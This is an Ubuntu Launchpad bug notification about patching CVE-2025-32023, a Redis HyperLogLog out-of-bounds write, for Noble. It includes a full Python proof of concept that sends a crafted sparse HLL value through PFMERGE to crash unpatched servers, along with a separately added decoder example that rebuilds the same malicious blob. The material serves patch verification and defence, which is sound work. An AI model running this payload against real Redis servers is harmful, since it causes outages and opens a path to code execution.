** Attachment added: "twd425_poc.py" https://bugs.launchpad.net/ubuntu/+source/redis/+bug/2141721/+attachment/5945724/+files/twd425_poc.py
** Description changed:

https://www.cve.org/CVERecord?id=CVE-2025-32023
https://ubuntu.com/security/CVE-2025-32023

Noble is vulnerable. This vulnerability is fixed in 8.0.3, 7.4.5, 7.2.10, and 6.2.19.

I tried to trigger it by installing redis-server (`apt-get install redis-server`) and running `/usr/bin/redis-server --port 30000`.

There is a PoC here: https://github.com/leesh3288/CVE-2025-32023/blob/main/poc.py

I modified it to make sure we didn't crash redis when the input was good.

When using `/usr/bin/redis-server --port 30000`:

```
ubuntu@launchpad:~$ python3 twd425_poc.py
Normal merge should work
Normal merge is good
trigger crash
pfmerge failed - as expected with bad input.
It crashed. Not patched yet!
ubuntu@launchpad:~$
```

After patching and running `./src/redis-server --port 30000`:

```
ubuntu@launchpad:~$ python3 twd425_poc.py
Normal merge should work
Normal merge is good
trigger crash
pfmerge failed - as expected with bad input.
It didn't crash. Patched!
ubuntu@launchpad:~$
```

The fix is based on this pull request from July 2025: https://github.com/redis/redis/pull/14173

The pull request also fixes CVE-2025-48367. I decided not to include the fix for the other CVE as I have not tested it yet.

The official fix for CVE-2025-32023 comes with 2 commits:
- c5de37d
- 78d5be1

I only applied c5de37d as that was the minimal change needed to make it work. The other commit, 78d5be1, is to support tcl8.5. Noble comes with tcl8.6, therefore I did not apply the second patch.

Built and tested on noble (multipass VM on aarch64) using:

```
DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -us -uc
./runtest --single unit/hyperloglog
\o/ All tests passed without errors!
```

$ cat ~/twd425_poc.py
```python
#!/usr/bin/env python3
# PoC for CVE-2025-32023: a crafted sparse HyperLogLog value makes PFMERGE
# write out of bounds. Based on
# https://github.com/leesh3288/CVE-2025-32023/blob/main/poc.py
import sys

import redis

HOST, PORT = 'localhost', 30000

try:
    r = redis.Redis(HOST, PORT)
    r.ping()
except redis.RedisError:
    print(f"Unable to connect to {HOST}:{PORT}")
    sys.exit(1)

HLL_SPARSE = 1

# Sparse HLL layout, see
# https://github.com/redis/redis/blob/f35f36a265403c07b119830aa4bb3b7d71653ec9/src/hyperloglog.c#L182
# 16-byte header ("HYLL", 1-byte encoding, 3 unused bytes, 8-byte cached
# cardinality) followed by opcodes:
#   XZERO: 01xxxxxx yyyyyyyy -> run of (14-bit value + 1) zero registers
#   VAL:   1vvvvvrr          -> register value (vvvvv + 1) repeated (rr + 1) times
good = b''
good += b'HYLL'
good += bytes([HLL_SPARSE])  # encoding - HLL_SPARSE is 1
good += b'\x00' * 3          # notused, 3 bytes
good += b'\x00' * 8          # card, 8 bytes
good += b'\x7f\xfe'  # XZERO(16383): 01 + 14-bit 16382, run length is stored minus one
good += b'\x80'      # VAL(1,1): 1 00000 00 -> value 1, run 1; 16384 registers in total
r.set('good', good)

r.pfadd('base', 'alice')

print("Normal merge should work")
r.pfmerge('merged', 'base', 'good')
print("Normal merge is good")

bad = b''
bad += b'HYLL'
bad += bytes([HLL_SPARSE])   # encoding - HLL_SPARSE is 1
bad += b'\x00' * 3           # notused, 3 bytes
bad += b'\x00' * 8           # card, 8 bytes
bad += b'\x7f\xff' * 0x20000  # XZERO(16384) x 131072 -> 2^31 registers, overflows the int index i
bad += b'\xff'                # VAL(32, 4) -> written past the register buffer
r.set('bad', bad)

print("trigger crash")
try:
    r.pfmerge('merged', 'base', 'bad')
    print("pfmerge worked - unexpected. This should not happen!")
    sys.exit(1)
except redis.RedisError:
    # ResponseError (INVALIDOBJ) on a patched server, ConnectionError if it died.
    print("pfmerge failed - as expected with bad input.")

# A fresh connection tells us whether the server survived the merge.
try:
    r = redis.Redis(HOST, PORT)
    r.ping()
    print("It didn't crash. Patched!")
except redis.RedisError:
    print("It crashed. Not patched yet!")
```

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/2141721

Title:
  CVE-2025-32023: Redis allows out of bounds writes in hyperloglog commands leading to RCE

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/redis/+bug/2141721/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
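Added example, not code from the bug report, the PoC or Redis itself: a Python decoder for the sparse HyperLogLog representation the PoC comments describe, with the bounds check a hardened sparse-to-dense conversion needs. It rejects the `bad` value at the second XZERO run instead of letting the register index run past the array, and a helper tracks the index the way a 32-bit C `int` would to show why the unchecked loop ends up writing at a negative offset. The constant names, helper functions and the `GOOD_BLOB`/`BAD_BLOB` inputs are this example's own (the blobs are constructed to match the PoC's values).

```python
# Added example (not from the bug report, the PoC or Redis): decode the sparse
# HyperLogLog format with an index bounds check after every opcode.
# Constants mirror Redis' hyperloglog.c; the inputs below are constructed here.
import struct

HLL_P = 14
HLL_REGISTERS = 1 << HLL_P   # 16384 registers
HLL_HDR_SIZE = 16            # "HYLL" + encoding + 3 unused + 8-byte cached card
HLL_DENSE, HLL_SPARSE = 0, 1


class InvalidHLL(ValueError):
    """Raised for a sparse HLL that a hardened decoder must reject."""


def sparse_opcodes(payload: bytes):
    """Yield (kind, runlen, value) tuples from a sparse HLL payload (header stripped)."""
    p, end = 0, len(payload)
    while p < end:
        b = payload[p]
        if b & 0xC0 == 0x00:                  # ZERO: 00xxxxxx -> 1..64 zero registers
            yield ("ZERO", (b & 0x3F) + 1, 0)
            p += 1
        elif b & 0xC0 == 0x40:                # XZERO: 01xxxxxx yyyyyyyy -> 1..16384 zeros
            if p + 1 >= end:
                raise InvalidHLL("truncated XZERO opcode")
            yield ("XZERO", (((b & 0x3F) << 8) | payload[p + 1]) + 1, 0)
            p += 2
        else:                                 # VAL: 1vvvvvrr -> value 1..32, run 1..4
            yield ("VAL", (b & 0x03) + 1, ((b >> 2) & 0x1F) + 1)
            p += 1


def sparse_to_dense(blob: bytes) -> list:
    """Expand a sparse HLL value into 16384 register values, rejecting any
    encoding whose runs would step outside the register array.

    The index is checked after every opcode, ZERO/XZERO runs included, so a
    chain of XZERO runs cannot push it past HLL_REGISTERS; Python ints do not
    wrap, but the same check also blocks the 32-bit wraparound in C."""
    if len(blob) < HLL_HDR_SIZE or blob[:4] != b"HYLL":
        raise InvalidHLL("bad magic or short header")
    if blob[4] != HLL_SPARSE:
        raise InvalidHLL("not a sparse HLL")
    registers = [0] * HLL_REGISTERS
    idx = 0
    for kind, runlen, value in sparse_opcodes(blob[HLL_HDR_SIZE:]):
        if idx + runlen > HLL_REGISTERS:
            raise InvalidHLL(f"{kind} run of {runlen} at index {idx} exceeds {HLL_REGISTERS} registers")
        if kind == "VAL":
            for i in range(idx, idx + runlen):
                registers[i] = value
        idx += runlen
    if idx != HLL_REGISTERS:
        raise InvalidHLL(f"sparse HLL covers {idx} registers, expected {HLL_REGISTERS}")
    return registers


def c_int32_index(blob: bytes) -> int:
    """Advance the register index through the zero runs the way a C `int`
    would (two's complement wrap at 2^31), stopping at the first VAL opcode."""
    idx = 0
    for kind, runlen, _ in sparse_opcodes(blob[HLL_HDR_SIZE:]):
        if kind == "VAL":
            break
        idx = ((idx + runlen + 2**31) % 2**32) - 2**31
    return idx


def make_header() -> bytes:
    return b"HYLL" + bytes([HLL_SPARSE]) + b"\x00" * 3 + struct.pack("<Q", 0)


# Constructed inputs matching the PoC: a valid value (XZERO 16383 + VAL(1,1))
# and the malicious one (131072 x XZERO 16384 followed by VAL(32,4)).
GOOD_BLOB = make_header() + b"\x7f\xfe" + b"\x80"
BAD_BLOB = make_header() + b"\x7f\xff" * 0x20000 + b"\xff"


def check(blob: bytes) -> str:
    """Summarise whether the decoder accepts a blob, for use as a quick probe."""
    try:
        regs = sparse_to_dense(blob)
        return f"ok: {sum(1 for r in regs if r)} non-zero registers"
    except InvalidHLL as e:
        return f"rejected: {e}"


if __name__ == "__main__":
    print("good:", check(GOOD_BLOB))
    print("bad: ", check(BAD_BLOB))
    print("bad index as C int before VAL:", c_int32_index(BAD_BLOB))
```

`c_int32_index(BAD_BLOB)` lands on -2147483648: after 131072 runs of 16384 the index reaches 2^31, which a 32-bit `int` in practice wraps to INT_MIN, so a check of the form `runlen + idx > HLL_REGISTERS` applied only at the VAL opcode still passes and the VAL(32,4) write goes to a negative offset. Checking the index after every run, as `sparse_to_dense` does, fails the input at the second XZERO before any register is touched.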
